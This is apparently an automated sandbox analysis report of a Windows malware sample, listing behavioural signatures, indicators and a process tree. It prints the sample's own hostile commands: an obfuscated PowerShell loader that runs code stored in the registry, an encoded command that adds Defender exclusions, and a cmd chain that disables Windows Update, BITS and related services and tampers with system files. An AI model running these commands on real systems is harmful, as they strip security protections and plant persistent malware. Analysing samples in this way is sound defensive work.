Analysis
max time kernel: 120s
max time network: 125s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 14-08-2024 18:22

Static task: static1
Behavioral task: behavioral1
  Sample: 40eeb7e6dc706f7e0eac78cc85213220N.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: 40eeb7e6dc706f7e0eac78cc85213220N.exe
  Resource: win10v2004-20240802-en

General
Target: 40eeb7e6dc706f7e0eac78cc85213220N.exe
Size: 4.8MB
MD5: 40eeb7e6dc706f7e0eac78cc85213220
SHA1: 28b55166002c4ba1c9af0ec4fd9f98b591d6e498
SHA256: 9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548
SHA512: 219713374a9bbaf254fd88f1834ca82fec95228b8de3890a466079866026491381caacd4309a9b7ab278cd5e92097fdee5105bbdbddc6c0b6743a6f871f6060f
SSDEEP: 98304:Ch5ZFrrBPngTB+XSOSp+yBmv1b4b4V+khcwhrkAkuRNSo:CTZFr5gT0XvyBmd4MsocFVuJ
Malware Config
Signatures

Modifies security service (2 TTPs, 2 IoCs)
Processes (description | ioc | process):
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
Processes (description | pid | process | target process):
  PID 952 created 408 | 952 | powershell.EXE | winlogon.exe
  PID 1344 created 408 | 1344 | powershell.EXE | winlogon.exe

Possible privilege escalation attempt (4 IoCs)
Processes (pid | process):
  824 | icacls.exe
  2364 | takeown.exe
  2608 | icacls.exe
  2052 | takeown.exe

Sets service image path in registry (2 TTPs, 1 IoCs)
Processes (description | ioc | process):
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Roaming\\Google\\Libs\\WR64.sys" | services.exe

Executes dropped EXE (1 IoCs)
Processes (pid | process):
  2104 | updater.exe

Loads dropped DLL (1 IoCs)
Processes (pid | process):
  2404 | taskeng.exe

Modifies file permissions (1 TTPs, 4 IoCs)
Processes (pid | process):
  2364 | takeown.exe
  2608 | icacls.exe
  2052 | takeown.exe
  824 | icacls.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow | ioc):
  4 | ip-api.com

Obfuscated Files or Information: Command Obfuscation (1 TTPs)
Adversaries may obfuscate content during command execution to impede detection.

Power Settings (1 TTPs, 10 IoCs)
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes (pid | process):
  2856 | cmd.exe
  2764 | powercfg.exe
  1688 | powercfg.exe
  2648 | powercfg.exe
  2792 | powercfg.exe
  2652 | powercfg.exe
  884 | powercfg.exe
  2784 | cmd.exe
  2296 | powercfg.exe
  2016 | powercfg.exe

Drops file in System32 directory (4 IoCs)
Processes (description | ioc | process):
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE

Suspicious use of SetThreadContext (4 IoCs)
Processes (description | pid | process | target process):
  PID 1360 set thread context of 1936 | 1360 | 40eeb7e6dc706f7e0eac78cc85213220N.exe | conhost.exe
  PID 952 set thread context of 1948 | 952 | powershell.EXE | dllhost.exe
  PID 1344 set thread context of 1956 | 1344 | powershell.EXE | dllhost.exe
  PID 2104 set thread context of 2452 | 2104 | updater.exe | dialer.exe

Drops file in Windows directory (7 IoCs)
Processes (description | ioc | process):
  File opened for modification | C:\Windows\Tasks\dialersvc32.job | svchost.exe
  File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
  File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc64.job | svchost.exe
  File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | svchost.exe
Launches sc.exe (10 IoCs)
sc.exe is a Windows utility to control services on the system.
Processes (pid | process):
  3004 | sc.exe
  2924 | sc.exe
  1616 | sc.exe
  2936 | sc.exe
  2760 | sc.exe
  2676 | sc.exe
  2172 | sc.exe
  2912 | sc.exe
  1204 | sc.exe
  2420 | sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes (description | ioc | process):
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.EXE
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | dllhost.exe

Modifies data under HKEY_USERS (2 IoCs)
Processes (description | ioc | process):
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.EXE
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00508b0a77eeda01 | powershell.EXE

Modifies registry key (1 TTPs, 14 IoCs)
Processes (pid | process):
  2636 | reg.exe
  2980 | reg.exe
  2780 | reg.exe
  1556 | reg.exe
  2528 | reg.exe
  1724 | reg.exe
  264 | reg.exe
  1276 | reg.exe
  532 | reg.exe
  2172 | reg.exe
  2528 | reg.exe
  2616 | reg.exe
  2684 | reg.exe
  2692 | reg.exe

Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (pid | process), in report order with repeated entries grouped:
  2092 | powershell.exe
  1360 | 40eeb7e6dc706f7e0eac78cc85213220N.exe
  952 | powershell.EXE (2 entries)
  1948 | dllhost.exe (repeated)
  1344 | powershell.EXE
  1948 | dllhost.exe (repeated)
  2904 | powershell.exe
  1948 | dllhost.exe (repeated)
  (1948 dllhost.exe accounts for the remaining 58 of the 64 entries)

Suspicious behavior: LoadsDriver (1 IoCs)
Processes (pid | process):
  460 | services.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (token | pid | process), in report order with consecutive svchost.exe entries grouped:
  SeDebugPrivilege | 2092 | powershell.exe
  SeShutdownPrivilege | 2648 | powercfg.exe
  SeShutdownPrivilege | 2296 | powercfg.exe
  SeShutdownPrivilege | 2792 | powercfg.exe
  SeShutdownPrivilege | 2652 | powercfg.exe
  SeDebugPrivilege | 1360 | 40eeb7e6dc706f7e0eac78cc85213220N.exe
  SeTakeOwnershipPrivilege | 2052 | takeown.exe
  SeDebugPrivilege | 952 | powershell.EXE (2 entries)
  SeDebugPrivilege | 1948 | dllhost.exe
  SeDebugPrivilege | 1344 | powershell.EXE
  SeAuditPrivilege | 836 | svchost.exe
  SeDebugPrivilege | 2904 | powershell.exe
  SeDebugPrivilege | 1344 | powershell.EXE
  SeDebugPrivilege | 1956 | dllhost.exe
  SeDebugPrivilege | 2104 | updater.exe
  SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege | 836 | svchost.exe (12 entries)
  SeShutdownPrivilege | 2764 | powercfg.exe
  SeShutdownPrivilege | 2016 | powercfg.exe
  (the same 12 svchost.exe token entries as above) | 836 | svchost.exe (12 entries)
  SeShutdownPrivilege | 884 | powercfg.exe
  (the same 12 svchost.exe token entries as above) | 836 | svchost.exe (12 entries)
  SeShutdownPrivilege | 1352 | Explorer.EXE
  SeShutdownPrivilege | 1688 | powercfg.exe
  SeLockMemoryPrivilege | 2452 | dialer.exe (2 entries)
  SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege | 836 | svchost.exe (5 entries; the list is cut off at 64)

Suspicious use of FindShellTrayWindow (64 IoCs)
Processes (pid | process):
  2452 | dialer.exe (64 entries)

Suspicious use of SendNotifyMessage (64 IoCs)
Processes (pid | process):
  2452 | dialer.exe (64 entries)

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes (pid | process):
  2696 | conhost.exe
  2988 | conhost.exe

Suspicious use of UnmapMainImage (1 IoCs)
Processes (pid | process):
  836 | svchost.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description | pid | process | target process); each event appears three times in the report unless noted:
  PID 1360 wrote to memory of 2092 | 1360 | 40eeb7e6dc706f7e0eac78cc85213220N.exe | powershell.exe
  PID 1360 wrote to memory of 2756 | 1360 | 40eeb7e6dc706f7e0eac78cc85213220N.exe | cmd.exe
  PID 1360 wrote to memory of 2784 | 1360 | 40eeb7e6dc706f7e0eac78cc85213220N.exe | cmd.exe
  PID 2756 wrote to memory of 2936 | 2756 | cmd.exe | sc.exe
  PID 2784 wrote to memory of 2648 | 2784 | cmd.exe | powercfg.exe
  PID 2756 wrote to memory of 3004 | 2756 | cmd.exe | sc.exe
  PID 2784 wrote to memory of 2296 | 2784 | cmd.exe | powercfg.exe
  PID 2756 wrote to memory of 2760 | 2756 | cmd.exe | sc.exe
  PID 2756 wrote to memory of 2924 | 2756 | cmd.exe | sc.exe
  PID 2784 wrote to memory of 2792 | 2784 | cmd.exe | powercfg.exe
  PID 2756 wrote to memory of 2676 | 2756 | cmd.exe | sc.exe
  PID 2756 wrote to memory of 2616 | 2756 | cmd.exe | reg.exe
  PID 2756 wrote to memory of 2636 | 2756 | cmd.exe | reg.exe
  PID 2784 wrote to memory of 2652 | 2784 | cmd.exe | powercfg.exe
  PID 2756 wrote to memory of 2684 | 2756 | cmd.exe | reg.exe
  PID 2756 wrote to memory of 2692 | 2756 | cmd.exe | reg.exe
  PID 2756 wrote to memory of 2528 | 2756 | cmd.exe | reg.exe
  PID 2756 wrote to memory of 2052 | 2756 | cmd.exe | takeown.exe
  PID 2756 wrote to memory of 824 | 2756 | cmd.exe | icacls.exe
  PID 2756 wrote to memory of 2980 | 2756 | cmd.exe | reg.exe
  PID 2756 wrote to memory of 1276 | 2756 | cmd.exe | reg.exe
  PID 2756 wrote to memory of 1724 | 2756 | cmd.exe | reg.exe (1 entry; the list is cut off at 64)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Format: image path | command line | PID; indentation shows the parent/child depth, and the bullets under a process are the signatures it triggered.

C:\Windows\system32\winlogon.exe | winlogon.exe | PID 408
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{cbe60bff-e555-4475-bc84-4afd6cf62758} | PID 1948
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\dllhost.exe | C:\Windows\SysWOW64\dllhost.exe /Processid:{037cba3c-de0e-40c6-82ba-f4de163d725c} | PID 1956
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\services.exe | C:\Windows\system32\services.exe | PID 460
  - Sets service image path in registry
  - Suspicious behavior: LoadsDriver
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch | PID 584
    C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | PID 1248
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k RPCSS | PID 664
  C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | PID 752
  C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted | PID 796
    C:\Windows\system32\Dwm.exe | "C:\Windows\system32\Dwm.exe" | PID 1288
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs | PID 836
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of UnmapMainImage
    C:\Windows\system32\taskeng.exe | taskeng.exe {72413DC2-2A6C-4540-B344-0104681548B4} S-1-5-18:NT AUTHORITY\System:Service: | PID 1132
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})" | PID 1344
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in System32 directory
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})" | PID 952
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in System32 directory
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\taskeng.exe | taskeng.exe {B9FA45F4-EB0A-4D77-B31A-B0F05C23D11D} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1] | PID 2404
      - Loads dropped DLL
      C:\Users\Admin\Google\Chrome\updater.exe | C:\Users\Admin\Google\Chrome\updater.exe | PID 2104
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA==" | PID 2904
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE | PID 1224
          C:\Windows\system32\sc.exe | sc stop UsoSvc | PID 2172
            - Launches sc.exe
          C:\Windows\system32\sc.exe | sc stop WaaSMedicSvc | PID 2912
            - Launches sc.exe
          C:\Windows\system32\sc.exe | sc stop wuauserv | PID 1616
            - Launches sc.exe
          C:\Windows\system32\sc.exe | sc stop bits | PID 1204
            - Launches sc.exe
          C:\Windows\system32\sc.exe | sc stop dosvc | PID 2420
            - Launches sc.exe
          C:\Windows\system32\reg.exe | reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f | PID 264
            - Modifies registry key
          C:\Windows\system32\reg.exe | reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f | PID 2780
            - Modifies registry key
          C:\Windows\system32\reg.exe | reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f | PID 1556
            - Modifies registry key
          C:\Windows\system32\reg.exe | reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f | PID 2172
            - Modifies registry key
          C:\Windows\system32\reg.exe | reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f | PID 2528
            - Modifies registry key
          C:\Windows\system32\takeown.exe | takeown /f C:\Windows\System32\WaaSMedicSvc.dll | PID 2364
            - Possible privilege escalation attempt
            - Modifies file permissions
          C:\Windows\system32\icacls.exe | icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q | PID 2608
            - Possible privilege escalation attempt
            - Modifies file permissions
        C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 | PID 2856
          - Power Settings
          C:\Windows\system32\powercfg.exe | powercfg /x -hibernate-timeout-ac 0 | PID 2764
            - Power Settings
            - Suspicious use of AdjustPrivilegeToken
          C:\Windows\system32\powercfg.exe | powercfg /x -hibernate-timeout-dc 0 | PID 2016
            - Power Settings
            - Suspicious use of AdjustPrivilegeToken
          C:\Windows\system32\powercfg.exe | powercfg /x -standby-timeout-ac 0 | PID 884
            - Power Settings
            - Suspicious use of AdjustPrivilegeToken
          C:\Windows\system32\powercfg.exe | powercfg /x -standby-timeout-dc 0 | PID 1688
            - Power Settings
            - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\dialer.exe | C:\Windows\System32\dialer.exe "uscznjtdlrpzim" | PID 2692
        C:\Windows\System32\dialer.exe | C:\Windows\System32\dialer.exe qogpttybmmmxi0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/mu1wJod3G4ybKfriFlvX5/cPzwC+grqJRncFX2oIaCyfgQwYP6oqAsEG81+jJCQn615LfOl9vDqqzuvSeBWHLRbB6RL3NI+uQLE2uPl2hMP1A8ZJSXCp5FNSxKz+yXD/3pmbyKEb10mByCjliFLzsw6IJHQ/U/t4Cy3hKy2hsX1MrQilste7aHM98jReFRFnY9V0hpt2FRrzdOIr9eBxZhGN4MtQ85PW3WIDt7sXsgtHPZMNwMSxC2lB5EW8mN2iLaBNv9P9/d5TzNalCUJ3tYTlHZ8k+EDexjNW2vVCitBX5qi8Qcugh54x/Ok44t8DlRY2E1nTgLgybRikhw6tWq2N32fhfpRZah0llH3luDEA33V1hXU5tEIDTdTdvtWVm5LOtDaE26OtMcfemyvXEyx5Xpl2V8/t+Nf6MKdylH0uzwa03zeM0xhOOP5d3bFAKRAqB3U5av+AkNeT2EsaabE5vtWDuynU6Bb1iu+qntQ= | PID 2452
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SendNotifyMessage
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService | PID 976
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService | PID 280
  C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe | PID 964
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork | PID 1016
  C:\Windows\system32\taskhost.exe | "taskhost.exe" | PID 1176
  C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE" | PID 2020
  C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation | PID 1916
  C:\Windows\system32\sppsvc.exe | C:\Windows\system32\sppsvc.exe | PID 1880

C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID 476

C:\Windows\system32\lsm.exe | C:\Windows\system32\lsm.exe | PID 484
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
    C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    - Suspicious use of WriteProcessMemory
    PID:2756
      C:\Windows\system32\sc.exe
      sc stop UsoSvc
      - Launches sc.exe
      PID:2936
      C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      - Launches sc.exe
      PID:3004
      C:\Windows\system32\sc.exe
      sc stop wuauserv
      - Launches sc.exe
      PID:2760
      C:\Windows\system32\sc.exe
      sc stop bits
      - Launches sc.exe
      PID:2924
      C:\Windows\system32\sc.exe
      sc stop dosvc
      - Launches sc.exe
      PID:2676
      C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
      - Modifies registry key
      PID:2616
      C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      - Modifies registry key
      PID:2636
      C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      - Modifies security service
      - Modifies registry key
      PID:2684
      C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      - Modifies registry key
      PID:2692
      C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      - Modifies registry key
      PID:2528
      C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
      PID:2052
      C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      - Possible privilege escalation attempt
      - Modifies file permissions
      PID:824
      C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
      - Modifies registry key
      PID:2980
      C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
      - Modifies registry key
      PID:1276
      C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
      - Modifies registry key
      PID:1724
      C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
      - Modifies registry key
      PID:532
      C:\Windows\system32\schtasks.exe
